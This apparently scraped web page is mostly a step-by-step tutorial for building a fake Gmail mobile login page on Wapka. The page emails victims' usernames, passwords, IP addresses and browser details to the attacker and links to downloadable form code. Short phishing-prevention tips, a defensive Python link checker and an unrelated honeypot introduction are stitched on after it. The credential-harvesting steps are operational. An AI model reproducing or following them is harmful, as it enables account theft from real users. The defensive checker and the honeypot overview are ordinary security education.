We are to create a website that looks exactly like Gmail mobile website. Then, we will receive the victim’s passwords, email id, IP address and browser information, through our email id.

 

Let’s discuss the detailed steps now:

1. Open the Wapka website and register a new account.

2. Log into the new account and go to the Site List to create a new site.

3. Type the site name. Only the characters a to z and the digits 0 to 9 are allowed; special characters are not.

For example, the site name newgmail21 gives the address newgmail21.wapka.mobi

4. After clicking “submit”, this should drive you to a screen with two options: either an Admin Mode or User Mode. You should click on “Admin Mode”.

5. A blank page should now appear, which is simply your site to which you have done nothing so far. To start editing your site, click on the link:: EDIT SITE(#):: This link is at the lower rightmost corner of the screen.

6. Click on the Mail form out of all the options which appear to you now.

7. A new screen will appear. You should uncheck “Enable CAPTCHA pictures”.

Now, click “submit”. Also, remember not to set it admin mode.

8. To make your own email address the destination for the victim's details, do the following:

A. Go to the site list and click on your site's name. Without choosing Admin Mode, scroll down and click "Source code viewer".

B. Type the link to your site into the box. A screen of code appears; search for the text "value=" and note the number next to it.

C. Hide the mail form in Admin Mode. This is done in the next steps, after you have recorded the value="XXXX..." code.

D. Click on your site and choose Admin Mode. The blank site appears again as before; click "Edit Site" and then "Users".

E. Click on "Items visibility" and select X from the drop-down menu.

F. Now, download the following code from this link:

https://www.hacking-tutorial.com/tools/subscribers/index.php?id=hckgml

G. Click on your site again and choose Admin Mode. Click "Edit site" and choose "WML/XHTML code". Paste the code you just downloaded into this section.

H. Replace the value="XXX..." in the pasted code with the value you extracted in step B.

9. The phishing site is now complete in design, appearance and function. Any victim's details are sent to the email address you registered on Wapka with; the message arrives from [email protected] and contains the username and password together with the victim's IP address and browser.

10. That is all: the page now captures the credentials of anyone who logs into it.

 

Where can't Wapka be used?

There are two places where Wapka is unusable:

1. Facebook: Facebook blocks any Wapka URL before it can be shared, because it blocks domains it considers harmful in order to protect its users.

2. India: the government has blocked the website in the country, so it cannot even be browsed from India. A proxy site, of course, gets around such a block as easily as any other.

 

How can one avoid being hacked through Gmail phishing?

1. Look at the full address in the URL bar, not just for "https". The padlock only means the connection is encrypted; any site, including a phishing site, can obtain a certificate. Before typing a password, make sure the host is accounts.google.com or another subdomain of google.com, and not a look-alike such as a google.com.<something-else> host or the <name>.wapka.mobi address a Wapka site gets.

2. If a link promises a "Free Offer, Free Lottery, Free Insurance, Free Net" or similar, do not click it; it is very likely a phishing site. This is common on messaging services such as WhatsApp and in SMS messages.

3. Do not open a link in an email just because it appears to come from a woman. Lures built around a female-sounding sender name are a common social-engineering trick aimed at male targets.

4. In a nutshell: recognize social engineering when you see it, and you avoid most phishing in general and Gmail phishing in particular.
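Point 1 above comes down to reading the host name correctly, and points 2 and 3, together with the four link-spreading tricks listed earlier on this page, come down to distrusting the link itself. The following is an added example, not part of the original tutorial, of the checks a mail gateway or a cautious user could apply to a link before following it: it parses the URL the way a browser will and accepts only https links whose registrable domain is the expected one, rejecting shorteners, raw IP hosts, user@host tricks and look-alike or internationalised host names along the way. The allow-list (google.com) and the shortener list are assumptions for illustration; the sample links are constructed, including the newgmail21.wapka.mobi name from the Wapka steps.

```python
"""Check whether a "Gmail login" link actually points at Google.

Added example for the prevention advice above; it is not part of the original
tutorial. The allowed domain and the shortener list are assumptions: a real
deployment would maintain both.
"""
import ipaddress
from urllib.parse import urlsplit

LEGIT_DOMAIN = "google.com"                                   # assumption: the only acceptable login domain
SHORTENERS = {"bit.ly", "tinyurl.com", "goo.gl", "t.co", "is.gd"}


def check_login_url(url):
    """Return (ok, reason). ok is True only for an https URL whose host is
    LEGIT_DOMAIN or a subdomain of it."""
    parts = urlsplit(url.strip())
    host = (parts.hostname or "").lower()         # hostname drops port, userinfo and case

    if parts.scheme != "https":
        return False, "not https: credentials would travel in the clear"
    if not host:
        return False, "no host in URL"
    if parts.username is not None:
        # https://google.com@evil.example/ shows "google.com" first but connects to evil.example
        return False, "user@host trick: real host is " + host
    try:
        ipaddress.ip_address(host)
        return False, "raw IP address instead of a hostname"
    except ValueError:
        pass
    if not host.isascii() or any(label.startswith("xn--") for label in host.split(".")):
        return False, "internationalised/punycode host, possible look-alike characters"
    if host in SHORTENERS:
        return False, "URL shortener hides the real destination"
    if host == LEGIT_DOMAIN or host.endswith("." + LEGIT_DOMAIN):
        return True, "host is under " + LEGIT_DOMAIN
    # Catches evil.example/accounts.google.com/..., accounts.google.com.evil.example
    # and goog1e.com alike: only the registrable domain at the end of the host counts.
    return False, "host %s is not under %s" % (host, LEGIT_DOMAIN)


# Constructed sample links, including the address a Wapka site gets (see the steps above).
SAMPLE_LINKS = [
    "https://accounts.google.com/signin/v2",
    "http://accounts.google.com/",
    "https://accounts.google.com.evil.example/",
    "https://evil.example/accounts.google.com/signin",
    "https://google.com@evil.example/login",
    "https://newgmail21.wapka.mobi/",
    "https://bit.ly/3abcdef",
    "https://203.0.113.5/gmail",
    "https://xn--ggle-0nda.com/",                # punycode label, whatever it decodes to
    "https://accounts.goog1e.com/",
]

if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        ok, reason = check_login_url(link)
        print("OK   " if ok else "PHISH", link, "-", reason)
```

Only the first sample link passes. Note what the function does not do: it cannot expand a shortened link offline, so it simply refuses shorteners, and it says nothing about a page that genuinely lives under the trusted domain. The reliable complement is a password manager or a FIDO security key, which releases a credential only to the exact origin it was registered on and therefore never fills in a login form on newgmail21.wapka.mobi no matter how convincing it looks.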

 

Sources

https://www.hacking-tutorial.com/hacking-tutorial/hacking-gmail-using-phishing-method-and-prevention/#sthash.4LzmArQ2.RNipUpcm.dpbs

 

Introduction to Honeypot Security

What is a honeypot?

Why is it important to talk about honeypots?

As the internet spreads into every part of our lives and we use it for almost every daily task, the security issues that come with it become more critical and more worth discussing. We use it for sending and receiving email, buying goods, paying bills and playing games online.

But how much do we know about security and the attacks that threaten our "online lives"? A victim's computer can be used by an attacker as a way into a network, where he plants whatever malicious code he wants; the same computer can then be turned into a zombie that infects other victims with that code.

Technology keeps developing and reaching into new fields, and new attacks follow it. The right response is to take an interest in security and learn how to defend ourselves and our computers against attacks that could do serious damage. Honeypots are an effective security tool that has been used increasingly over the last decade to defend large networks against attacks that could harm an entire organization.

A honeypot is a deliberately designed system whose purpose is to attract attackers. Once an attacker is inside, his behavior can be monitored easily, and every process he starts and every malicious action he takes is recorded from the moment he falls into the trap, so accurate information about many kinds of attack can be gathered. In short, a honeypot is a trap machine built to look exactly like a real system, so that an attacker takes the bait.

Why do this? To watch the attacker, analyze his behavior and understand what he does on a system we care about, so that the real system can be protected against him. That knowledge helps to build more secure systems; it teaches network administrators how to recover evidence from a compromised machine with forensic tools; and it reveals new attack techniques early, so that they can be defended against before they cause harm.

 

One useful way for a network administrator to test how effective a honeypot is: build it on a machine whose security flaws and weaknesses are already known, then try to break into and exploit that system yourself, and use your forensic tools to investigate it and identify the traces the simulated intruder left behind. Beyond testing the honeypot itself, the administrator must choose the right place for it in the network and understand what risks the honeypot itself adds to the system or the network.

Honeypots are unique in that they let a security researcher see and record what a malicious user does on a compromised computer without interfering, and without revealing to the attacker that he is being watched. Because of this invisibility, valuable intelligence can be gathered about attackers' real strategies. A honeypot can be configured to respond to attacks proactively or reactively, depending on the needs of the person deploying it.


 

Resources:

http://www.diva-portal.org/smash/get/diva2:327476/fulltext01

https://www2.cs.arizona.edu/~collberg/Teaching/466-566/2012/Resources/presentations/2012/topic12-final/report.pdf